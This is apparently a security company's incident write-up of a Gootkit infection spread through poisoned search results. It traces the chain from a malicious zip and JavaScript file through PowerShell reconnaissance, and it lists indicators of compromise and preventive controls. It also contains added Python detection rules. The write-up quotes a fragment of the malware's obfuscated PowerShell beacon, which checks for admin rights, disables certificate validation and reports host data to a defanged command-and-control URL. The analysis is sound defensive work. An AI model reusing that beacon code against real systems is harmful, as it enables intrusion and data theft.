
Gootkit Malware Exploit

Published: March 4, 2024
Updated: May 29, 2024
Expert: Sam B
Role: SOC Lead
Specialises in: Cyber Security Operations
What you will learn:
Our SOC Lead, Sam B, takes you through our recent encounter with a GootKit exploit.
At its core, Gootkit is designed to steal sensitive information by injecting malicious code into web browsers, which then captures user input (like usernames, passwords, and other personal information) before it is encrypted and sent over the internet. Want to know more about this malware? Keep reading...
At Stripe OLT, our analysts face new challenges every day, and occasionally, we come across something noteworthy…

Recently, at Stripe OLT, our team encountered a Gootkit malware exploit in one of our client’s systems. Gootkit, while not as widely recognised as some other malware families, has developed from a simple trojan into a complex tool that delivers various malicious payloads, exploits vulnerabilities, and gains unauthorised access to data.

The process below walks you through our experience with this specific Gootkit exploit, from the initial detection to how we ultimately isolated the risk. It is a straightforward look at how we handled the situation, in the hope that readers can gain insight into the risks associated with downloaded ransomware.

The following is a walk-through of a genuine GootKit prevention event: a reconnaissance, persistence and ransomware deployment mechanism.

Incident Prevention Walkthrough

Using specific terminology as bait, a threat actor lured an end user by exploiting demand for a common document template. Through an otherwise legitimate WordPress site, the threat actor planted a poisoned search engine result for a term related to that document template.
Diagram of Exploit Process

Incident Walkthrough

We'll explore the incident in a condensed step-by-step format to highlight the behaviours exhibited by Gootkit.

Enter our End User

Casually browsing Bing without a care in the world.
Seeing a hit for their search 'international deposit netting agreements', they clicked the link.
The user navigates to the domain and downloads a zipped file. The file name checks out and matches their search term.

File Created

A file is created and added to the Downloads folder.
Internationaldepositnettingagreement_0121.zip
C:\Users\user@example.com\Downloads

Potential Prevention

With adequate threat intelligence, and the right automated preventative controls, any further interaction or threat could have been mitigated.
Threat intelligence feeds
IP reputation Blocks
Domain reputation blocks
Automated blocking of WordPress sites
.zip extension download alerting/blocks

User File Execution

Opening the .ZIP file, our user runs the JavaScript file it contains.
international deposit netting agreement 8965.js

JavaScript Execution

Triggering the JavaScript results in the execution of sequential actions designed to create persistence, perform reconnaissance, and pave the way for ransomware deployment.

Registry Value Set and Modified

C:\Windows\System32\WScript.exe.FriendlyAppName
wscript.exe modifies a registry value and creates a scheduled task called 'location selection'. This scheduled task runs the script ITERAT~1.JS.
IHost.Sleep("11111")
The script pauses execution on the host.
IHost.FullName()
The script retrieves the full name or path of the host application (the script engine running it).
IHost.ScriptFullName
Similar to the previous call, this returns the full path of the script file itself.
IHost.CreateObject("shell.APPlicaTion")
Creates an instance of the Shell.Application object.
IShellDispatch6.ShellExecute("cscript.exe", "ITERAT~1.JS", "C:\Users\User", "oPEn", "0");
This call executes ITERAT~1.JS with 'cscript.exe', using C:\Users\User as the working directory and a hidden window (show flag 0).
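As an added detection example (not code from the original post or from Stripe OLT), the following Python scores process-creation records, in the shape of Sysmon or EDR telemetry, for the script-host chain described above: a .js run by wscript.exe from a user-writable path, and cscript.exe launched by wscript.exe with an 8.3 short name such as ITERAT~1.JS. The sample events, user names and paths are constructed.

```python
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Paths a standard user can write to; script hosts are rarely run legitimately from here.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\(Roaming|Local))\\", re.I)
# Any .js argument, and the 8.3 short-name form (ITERAT~1.JS) the scheduled task used.
JS_ARG = re.compile(r"\.js\b", re.I)
SHORT_NAME_JS = re.compile(r"~\d\.js\b", re.I)

@dataclass
class ProcEvent:
    image: str          # full path of the new process
    command_line: str   # its command line, as logged
    parent_image: str   # full path of the parent process

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the reasons a process-creation event matches the Gootkit script-host chain."""
    reasons = []
    if _basename(ev.image) not in SCRIPT_HOSTS:
        return reasons
    if JS_ARG.search(ev.command_line) and USER_WRITABLE.search(ev.command_line):
        reasons.append("script host running .js from a user-writable path")
    if _basename(ev.parent_image) in SCRIPT_HOSTS:
        reasons.append("script host launched by another script host")
    if SHORT_NAME_JS.search(ev.command_line):
        reasons.append("8.3 short-name .js argument")
    return reasons

def flag_events(events):
    """Return (event, reasons) pairs for every event with at least one match."""
    return [(ev, score_event(ev)) for ev in events if score_event(ev)]

# Constructed sample telemetry mirroring the walkthrough (user names and paths are made up).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user@example.com\Downloads\international deposit netting agreement 8965.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\cscript.exe",
              r'cscript.exe "C:\Users\User\AppData\Roaming\discovered resource\ITERAT~1.JS"',
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\System32\cscript.exe",           # benign: Windows licensing script
              r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for ev, reasons in flag_events(SAMPLE_EVENTS):
        print(_basename(ev.image), "<-", _basename(ev.parent_image), ":", "; ".join(reasons))
```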

Triggering PowerShell Scripts

Multiple unsigned and partially obfuscated PowerShell scripts trigger, performing system discovery and reconnaissance actions.
{$_.nAMe}
Extracts the 'Name' property from the current pipeline object. Used in conjunction with 'Get-Process', it returns the name of each process.
{$_.mAinwindowTITLe}
The script block extracts the MainWindowTitle property of each process, which is the title of the main window associated with that process.
{$_.nAME+"^"+$_.MaInwIndowTITle}
Joins the 'Name' and 'MainWindowTitle' properties of each process found, separated by a caret.
{$_.FrEE -gT 50000}
Checks whether the infected device has more than a certain amount (50000) of free disk space.
SELECT * FROM Win32_LogicalDisk WHERE DeviceId='H:'
A WMI query that looks for a logical disk with the drive letter H:.
'whoami'
Displays information regarding the current user, including group and privilege assignments.
Once deployed, GootKit will perform situation awareness tasks to understand the environment. Looking for active processes, host information and disk space is essential reconnaissance before deploying ransomware into an environment.

More chances to prevent

With multiple PowerShell scripts running with standard user privileges, there are different preventative measures that could have been enforced to hinder the activity.
Prevent unsigned PowerShell scripts from running.
Prevent obfuscated scripts from running.
Prevent standard privilege user accounts from executing PowerShell scripts.
Audit and alert suspicious system discovery activities.
Threat intelligence feeds and blocks for file hashes and domains.
Suspicious Registry value change blocks/alerting.

Further System Discovery

The heavily obfuscated script performs further system discovery, including checking whether the current user holds administrative privileges.
The result is stored in '$isLocalAdmin' (1 for an administrator, 0 otherwise) and used to build the string '$u6', which begins with the marker "ADA3EA8A0D" followed by that flag. Using GET and POST requests, the compromised endpoint then used an HTTPS implant to communicate with an attacker-controlled command and control service.
if ((New-Object (Security.Principal.WindowsPrincipal) ([Security.Principal.WindowsIdentity]::((GetCurrent))())).IsInRole([Security.Principal.WindowsBuiltinRole]::(Administrator))) {
    $isLocalAdmin = "1"
} else {
    $isLocalAdmin = "0"
};

$splitString = ADA3EA8A0D;

$g8 = new-object ($w[30]);
function r3($a4) {
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
    [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
    $c9 = ($w[46]);
    $r1 = 30000;
    $c8 = (hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php);
    $u6 = "ADA3EA8A0D=$($isLocalAdmin)";
    if ($g8.(Count) -ne 0) {
        $u6 = "$u6!" + ($g8 -join "|")
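As a second added example (again not from the original post or from Stripe OLT), this Python scores PowerShell script text, such as the ScriptBlock text recorded in Event ID 4104 logs, for the traits shown in the reconnaissance blocks above and in this beacon: certificate validation switched off, a local-admin check, process enumeration joined into one report string, a WordPress xmlrpc.php endpoint, and mixed-case member names. Both script excerpts are constructed, and the C2 URL is a placeholder.

```python
import re

# Constructed PowerShell excerpt shaped like the beacon quoted above: the C2 URL is a
# placeholder, and the member names copy the page's $_.nAMe / $_.mAinwindowTITLe casing.
SUSPICIOUS_BLOCK = r'''
[Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
if ((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) { $isLocalAdmin = "1" } else { $isLocalAdmin = "0" };
$g8 = Get-Process | ForEach-Object { $_.nAMe + "^" + $_.mAinwindowTITLe };
$c8 = "https://wordpress.example/xmlrpc.php";
$u6 = "ADA3EA8A0D=$($isLocalAdmin)!" + ($g8 -join "|");
'''
# Constructed benign admin one-liner for comparison.
BENIGN_BLOCK = r'''
Get-Process | Where-Object { $_.MainWindowTitle } | Select-Object Name, MainWindowTitle
'''

RULES = [
    ("high", "TLS certificate validation disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("medium", "local-admin check via WindowsBuiltinRole::Administrator",
     re.compile(r"IsInRole\(.*WindowsBuiltinRole\]::\(?Administrator", re.I)),
    ("medium", "WordPress xmlrpc.php used as an HTTP endpoint",
     re.compile(r"https?://[^\s\"']+/xmlrpc\.php", re.I)),
    ("low", "process name/window-title enumeration joined into one string",
     re.compile(r"MainWindowTitle.*-join", re.I | re.S)),
]
# PowerShell member names are conventionally PascalCase; a lower-case start with capitals
# inside (nAMe, mAinwindowTITLe) is a cheap heuristic tell of case-randomising obfuscation.
ODD_CASE_MEMBER = re.compile(r"\$_\.([a-z]+[A-Z][A-Za-z]*)")

def analyse(script_text):
    """Return (severity, reason) findings for one script block."""
    findings = [(sev, why) for sev, why, rx in RULES if rx.search(script_text)]
    odd = ODD_CASE_MEMBER.findall(script_text)
    if odd:
        findings.append(("medium", "mixed-case member names: " + ", ".join(odd)))
    return findings

def verdict(script_text):
    """'suspicious' on any high-severity hit or three or more findings, else 'benign'."""
    findings = analyse(script_text)
    high = any(sev == "high" for sev, _ in findings)
    return ("suspicious" if high or len(findings) >= 3 else "benign"), findings

if __name__ == "__main__":
    for name, block in (("beacon", SUSPICIOUS_BLOCK), ("admin", BENIGN_BLOCK)):
        print(name, *verdict(block))
```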

End User Behaviour Trigger

Our user logs off for the day, shutting down their device.
The next morning arrives, and our user opens their laptop to begin a busy day of work.
The logon satisfies the scheduled task's trigger, and PowerShell attempts to communicate with remote hosts over multiple channels.

SOC Intervention

Fortunately, at this point, the SOC had been called in to intervene.
Our team was able to assess the indicators and behaviour shown and respond appropriately.
We implemented device isolation, entity blocks, and remediation steps to prevent there being any further exploration or exploitation of the environment. No successful lateral movement, credential access or file exfiltration occurred.
Typically, following the deployment of Gootkit on an endpoint device, the goal is to move laterally through the environment until the actor reaches the goal of an appropriate server with admin rights available to then deploy ransomware. Fortunately, during this event, this did not occur. Not a Goot day for the threat actor.
IOC data from this event is below.
DO NOT NAVIGATE TO THE LISTED ENTITIES.
If you're a security or IT practitioner, use these to harden your environment against this exploit!
BING Search URL
hxxps[://]www.bing[.]com[/]search?q=International+Deposit+Netting+Agreement&cvid=e3b01e2049004d85a49beeaadb8e535d&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIHCAEQRRj8VdIBBzc2N2owajmoAgCwAgA&PC=U531&FPIG=51FDC77EC18F4C9B9437A85F1B616802&first=21&FORM=PERE[1]

Initial Redirect Domain
thirstymag[.]com

Compromised Domain
thirstymag[.]com/blog[.]php
18[.]209[.]242[.]38

Downloaded .zip
International_deposit_netting_agreement_62671.zip
Hash
1acc0ccc9b45a61bf5e72de4b4d498f6ffbf6d5feb765564a8d51b5ec88b9bb6

Initial JavaScript
international deposit netting agreement 37722.js
Hash
f19e3772bad5d660cedffec7a71ffb360ed7e4f7f375d365ca8023629ccb6d63

Scheduled Task Script
ITERAT~1.JS
Hash
b0f6225aee8447d64fd522f2e2cb625a07f91f38c89217796c621d2d1cbd5143
Path
C:\Users\user@domain.com\AppData\Roaming\'discovered resource'

URLs / Domains
hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php